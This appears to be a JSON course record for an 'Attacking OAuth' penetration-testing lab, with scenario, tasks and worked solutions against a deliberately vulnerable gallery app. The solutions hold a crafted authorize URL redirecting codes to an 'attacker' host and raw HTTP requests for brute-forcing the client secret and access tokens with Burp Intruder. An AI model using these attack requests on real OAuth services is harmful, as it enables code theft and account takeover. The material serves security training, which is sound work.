{
    "id": "8f3772a5-10b5-4a0d-8f6f-9325f1168a0f",
    "name": "Attacking OAuth",
    "slug": "attacking-oauth",
    "status": "published",
    "lab_type": "pta",
    "is_sample": false,
    "duration_in_seconds": 1800,
    "metadata": {
        "courses": [
            "1dce1618-55b6-4205-9799-e509ad2b2c77",
            "630a470a-1ccf-44eb-8111-8947846b5d78"
        ],
        "pta_sdn": "230",
        "collections": [],
        "pta_namespace": "my.ine",
        "learning_paths": [],
        "has_published_parent": true
    },
    "session": null,
    "company": "a491bc32-c056-4946-9169-cc053387bada",
    "created": "2022-06-23T21:17:16.494455Z",
    "modified": "2024-11-27T14:52:47.257941Z",
    "is_beta": false,
    "lab_objectives": [],
    "main_learning_area": "3e1aa06f-2e9f-4789-b50d-aa027ad8dcfa",
    "learning_areas": [
        {
            "id": "3e1aa06f-2e9f-4789-b50d-aa027ad8dcfa",
            "name": "Cyber Security",
            "slug": "cyber-security"
        }
    ],
    "categories": [],
    "tags": [],
    "difficulty": null,
    "is_web_access": false,
    "is_lab_experience": false,
    "is_featured": false,
    "cve": null,
    "severity": null,
    "year": null,
    "classification": null,
    "is_trackable": false,
    "cpe_credits": null,
    "is_skill_check": false,
    "external_url": "",
    "solution_video": null,
    "explanation_video": null,
    "description": "# Attacking OAuth\n\n# Scenario\n\nYour goal in this lab will be to try some common attacks against a vulnerable, OAuth-powered web application. Prepare the attacks and their working proof of concepts as if you were submitting these to a bug bounty program or a penetration testing report. The web application is based on the below GitHub repository <https://github.com/koenbuyens/Vulnerable-OAuth-2.0-Applications>\n\n# Goals\n\n-   Create a working proof of concept to attack an OAuth client once he visits a malicious URL\n\n    -   Find an alternative way to gain access to protected resources\n\n# What you will learn\n\n-   Auditing and attacking OAuth implementations\n\n-   Creating a proof of concept for client-side attacks against insecure OAuth implementations\n\n# Recommended tools\n\n-   BurpSuite\n\n-   OAuth 2.0 documentation\n\n# Network Configuration\n\nThe target application can be found at **http://gallery:3005**\n\nThe username is **koen** and the password is **password**.",
    "description_html": "<h1>Attacking OAuth</h1>\n<h1>Scenario</h1>\n<p>Your goal in this lab will be to try some common attacks against a vulnerable, OAuth-powered web application. Prepare the attacks and their working proof of concepts as if you were submitting these to a bug bounty program or a penetration testing report. The web application is based on the below GitHub repository <a href=\"https://github.com/koenbuyens/Vulnerable-OAuth-2.0-Applications\">https://github.com/koenbuyens/Vulnerable-OAuth-2.0-Applications</a></p>\n<h1>Goals</h1>\n<ul>\n<li>\n<p>Create a working proof of concept to attack an OAuth client once he visits a malicious URL</p>\n<ul>\n<li>Find an alternative way to gain access to protected resources</li>\n</ul>\n</li>\n</ul>\n<h1>What you will learn</h1>\n<ul>\n<li>\n<p>Auditing and attacking OAuth implementations</p>\n</li>\n<li>\n<p>Creating a proof of concept for client-side attacks against insecure OAuth implementations</p>\n</li>\n</ul>\n<h1>Recommended tools</h1>\n<ul>\n<li>\n<p>BurpSuite</p>\n</li>\n<li>\n<p>OAuth 2.0 documentation</p>\n</li>\n</ul>\n<h1>Network Configuration</h1>\n<p>The target application can be found at <strong>http://gallery:3005</strong></p>\n<p>The username is <strong>koen</strong> and the password is <strong>password</strong>.</p>",
    "tasks": "# Tasks\n\n## Task 1. Create a code stealing PoC\n\nCraft an URL that can be sent to a victim in order to steal the authorization code once he/she logs in into the **/oauth** endpoint. You can use the following data: the response type is \"**code**\", the scope is \"**view_gallery**\" and the client_id is \"**photoprint**\".\n\n## Task 2. Use the acquired code to bruteforce the client secret\n\nUse a POST request to the /token endpoint in order to bruteforce the client secret. Consult with OAuth's documentation to recreate the request. The **grant type** is \"**authorization_code**\"\n\n## Task 3. Discover another token vulnerability\n\nDiscover another vulnerability by abusing the **/photos/me?access_token=** endpoint.",
    "tasks_html": "<h1>Tasks</h1>\n<h2>Task 1. Create a code stealing PoC</h2>\n<p>Craft an URL that can be sent to a victim in order to steal the authorization code once he/she logs in into the <strong>/oauth</strong> endpoint. You can use the following data: the response type is \"<strong>code</strong>\", the scope is \"<strong>view_gallery</strong>\" and the client_id is \"<strong>photoprint</strong>\".</p>\n<h2>Task 2. Use the acquired code to bruteforce the client secret</h2>\n<p>Use a POST request to the /token endpoint in order to bruteforce the client secret. Consult with OAuth's documentation to recreate the request. The <strong>grant type</strong> is \"<strong>authorization_code</strong>\"</p>\n<h2>Task 3. Discover another token vulnerability</h2>\n<p>Discover another vulnerability by abusing the <strong>/photos/me?access_token=</strong> endpoint.</p>",
    "published_date": "2020-10-20T15:32:24Z",
    "solutions": "# Solutions\n\nBelow, you can find solutions for each task. Remember though, that you can follow your own strategy, which may be different from the one explained in the following lab.\n\n## Task 1. Create a code stealing PoC\n\nBased on OAuth's documentation available on <https://tools.ietf.org/html/rfc6749> you can construct the following GET request. Note that you have to be logged out upon visiting this URL.\n```\nhttp://gallery:3005/oauth/authorize?response_type=code&redirect_uri=http%3A%2F%2Fattacker%2Fcallback&scope=view_gallery&client_id=photoprint\n```\n\nUpon logging in, there is a \"consent screen\", which has to be accepted, just like a regular login via OAuth.\n\n![1](https://assets.ine.com/content/advanced-wapt/attacking-oauth/1.png)\n\n\nThen, the user is redirected to the \"attacker\" website with the authorization code in the callback value. Any user that is sent the above URL and will log in via it, will make a request to the attacker website disclosing the authorization code.\n\n![2](https://assets.ine.com/content/advanced-wapt/attacking-oauth/2.png)\n\nThe underlying vulnerability is an unvalidated redirection.\n\n## Task 2. Use the acquired code to bruteforce the client secret\n\nBased on a sample Token request (<https://auth0.com/docs/api-auth/tutorials/authorization-code-grant>) you can construct the following POST request.\n\n```\nPOST /token HTTP/1.1\nHost: gallery:3005\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 137\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nredirect_uri=http%3A%2F%2Fgallery%3A3005%2Fcallback&grant_type=authorization_code&client_id=photoprint&client_secret=\u00a7guess\u00a7&code=44438\n```\n\n**Note**: Copy-pasting the above request may result in formatting issues that will cause the HTTP request to be malformed. The best way to reproduce that request is to log in as described in the manual (by obtaining the first code), capture the request using Burp and send it to Repeater.\n\nUsing Burp Intruder and a wordlist (we used Rockyou-10 available [here](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou-10.txt)) you can bruteforce the client secret.\n\n![3](https://assets.ine.com/content/advanced-wapt/attacking-oauth/3.png)\n\n![4](https://assets.ine.com/content/advanced-wapt/attacking-oauth/4.png)\n\n![5](https://assets.ine.com/content/advanced-wapt/attacking-oauth/5.png)\n\n\n\nAfter starting the attack, soon we realize that the client secret is \"**secret**\".\n\n![6](https://assets.ine.com/content/advanced-wapt/attacking-oauth/6.png)\n\n![7](https://assets.ine.com/content/advanced-wapt/attacking-oauth/7.png)\n\n![8](https://assets.ine.com/content/advanced-wapt/attacking-oauth/8.png)\n\n\n**In the Repeater window:**  \n\n```\nPOST /token HTTP/1.1\nHost: gallery:3005\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 136\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nredirect_uri=http%3A%2F%2Fgallery%3A3005%2Fcallback&grant_type=authorization_code&client_id=photoprint&client_secret=secret&code=44438\n```\n\n![9](https://assets.ine.com/content/advanced-wapt/attacking-oauth/9.png)\n\n**Note:** Specify the **code** that you received in the response.  \n\nThe response access token can now be supplied to the **/photos/me?access_token=** endpoint.\n\n```\nGET /photos/me?access_token=35580 HTTP/1.1\nHost: gallery:3005\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\n```\n\n**Note:** Make sure to replace the access code in the above request with the one you get back from the request before this one.  \n\n\n![10](https://assets.ine.com/content/advanced-wapt/attacking-oauth/10.png)\n\n## Task 3. Discover another token vulnerability\n\nAt **/photos/me?access_token=[code]** you are able to bruteforce the valid token. This will require the following Burp Intruder configuration:  \n\n```\nGET /photos/me?access_token=\u00a7\u00a7 HTTP/1.1\nHost: gallery:3005\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\n```\n\n![11](https://assets.ine.com/content/advanced-wapt/attacking-oauth/11.png)\n\n![12](https://assets.ine.com/content/advanced-wapt/attacking-oauth/12.png)\n\n![13](https://assets.ine.com/content/advanced-wapt/attacking-oauth/13.png)\n\n![14](https://assets.ine.com/content/advanced-wapt/attacking-oauth/14.png)\n\nThis way, an attacker is able to compromise active tokens via bruteforce in an unlimited way. Note, that in a real application there might be multiple active tokens. As we have just one active token, the time for bruteforcing it might be much longer.",
    "solutions_html": "<h1>Solutions</h1>\n<p>Below, you can find solutions for each task. Remember though, that you can follow your own strategy, which may be different from the one explained in the following lab.</p>\n<h2>Task 1. Create a code stealing PoC</h2>\n<p>Based on OAuth's documentation available on <a href=\"https://tools.ietf.org/html/rfc6749\">https://tools.ietf.org/html/rfc6749</a> you can construct the following GET request. Note that you have to be logged out upon visiting this URL.\n<pre class=\"codehilite\"><code>http://gallery:3005/oauth/authorize?response_type=code&amp;redirect_uri=http%3A%2F%2Fattacker%2Fcallback&amp;scope=view_gallery&amp;client_id=photoprint</code></pre></p>\n<p>Upon logging in, there is a \"consent screen\", which has to be accepted, just like a regular login via OAuth.</p>\n<p><img alt=\"1\" src=\"https://assets.ine.com/content/advanced-wapt/attacking-oauth/1.png\" /></p>\n<p>Then, the user is redirected to the \"attacker\" website with the authorization code in the callback value. Any user that is sent the above URL and will log in via it, will make a request to the attacker website disclosing the authorization code.</p>\n<p><img alt=\"2\" src=\"https://assets.ine.com/content/advanced-wapt/attacking-oauth/2.png\" /></p>\n<p>The underlying vulnerability is an unvalidated redirection.</p>\n<h2>Task 2. Use the acquired code to bruteforce the client secret</h2>\n<p>Based on a sample Token request (<a href=\"https://auth0.com/docs/api-auth/tutorials/authorization-code-grant\">https://auth0.com/docs/api-auth/tutorials/authorization-code-grant</a>) you can construct the following POST request.</p>\n<pre class=\"codehilite\"><code>POST /token HTTP/1.1\nHost: gallery:3005\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 137\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nredirect_uri=http%3A%2F%2Fgallery%3A3005%2Fcallback&amp;grant_type=authorization_code&amp;client_id=photoprint&amp;client_secret=\u00a7guess\u00a7&amp;code=44438</code></pre>\n\n<p><strong>Note</strong>: Copy-pasting the above request may result in formatting issues that will cause the HTTP request to be malformed. The best way to reproduce that request is to log in as described in the manual (by obtaining the first code), capture the request using Burp and send it to Repeater.</p>\n<p>Using Burp Intruder and a wordlist (we used Rockyou-10 available <a href=\"https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou-10.txt\">here</a>) you can bruteforce the client secret.</p>\n<p><img alt=\"3\" src=\"https://assets.ine.com/content/advanced-wapt/attacking-oauth/3.png\" /></p>\n<p><img alt=\"4\" src=\"https://assets.ine.com/content/advanced-wapt/attacking-oauth/4.png\" /></p>\n<p><img alt=\"5\" src=\"https://assets.ine.com/content/advanced-wapt/attacking-oauth/5.png\" /></p>\n<p>After starting the attack, soon we realize that the client secret is \"<strong>secret</strong>\".</p>\n<p><img alt=\"6\" src=\"https://assets.ine.com/content/advanced-wapt/attacking-oauth/6.png\" /></p>\n<p><img alt=\"7\" src=\"https://assets.ine.com/content/advanced-wapt/attacking-oauth/7.png\" /></p>\n<p><img alt=\"8\" src=\"https://assets.ine.com/content/advanced-wapt/attacking-oauth/8.png\" /></p>\n<p><strong>In the Repeater window:</strong>  </p>\n<pre class=\"codehilite\"><code>POST /token HTTP/1.1\nHost: gallery:3005\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 136\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nredirect_uri=http%3A%2F%2Fgallery%3A3005%2Fcallback&amp;grant_type=authorization_code&amp;client_id=photoprint&amp;client_secret=secret&amp;code=44438</code></pre>\n\n<p><img alt=\"9\" src=\"https://assets.ine.com/content/advanced-wapt/attacking-oauth/9.png\" /></p>\n<p><strong>Note:</strong> Specify the <strong>code</strong> that you received in the response.  </p>\n<p>The response access token can now be supplied to the <strong>/photos/me?access_token=</strong> endpoint.</p>\n<pre class=\"codehilite\"><code>GET /photos/me?access_token=35580 HTTP/1.1\nHost: gallery:3005\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1</code></pre>\n\n<p><strong>Note:</strong> Make sure to replace the access code in the above request with the one you get back from the request before this one.  </p>\n<p><img alt=\"10\" src=\"https://assets.ine.com/content/advanced-wapt/attacking-oauth/10.png\" /></p>\n<h2>Task 3. Discover another token vulnerability</h2>\n<p>At <strong>/photos/me?access_token=[code]</strong> you are able to bruteforce the valid token. This will require the following Burp Intruder configuration:  </p>\n<pre class=\"codehilite\"><code>GET /photos/me?access_token=\u00a7\u00a7 HTTP/1.1\nHost: gallery:3005\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1</code></pre>\n\n<p><img alt=\"11\" src=\"https://assets.ine.com/content/advanced-wapt/attacking-oauth/11.png\" /></p>\n<p><img alt=\"12\" src=\"https://assets.ine.com/content/advanced-wapt/attacking-oauth/12.png\" /></p>\n<p><img alt=\"13\" src=\"https://assets.ine.com/content/advanced-wapt/attacking-oauth/13.png\" /></p>\n<p><img alt=\"14\" src=\"https://assets.ine.com/content/advanced-wapt/attacking-oauth/14.png\" /></p>\n<p>This way, an attacker is able to compromise active tokens via bruteforce in an unlimited way. Note, that in a real application there might be multiple active tokens. As we have just one active token, the time for bruteforcing it might be much longer.</p>",
    "flags": [],
    "min_points_to_pass": null,
    "access_type": "default",
    "user_status": "unstarted",
    "user_lab_status": null,
    "user_status_modified": null,
    "user_flags": [],
    "global_running_session": null
}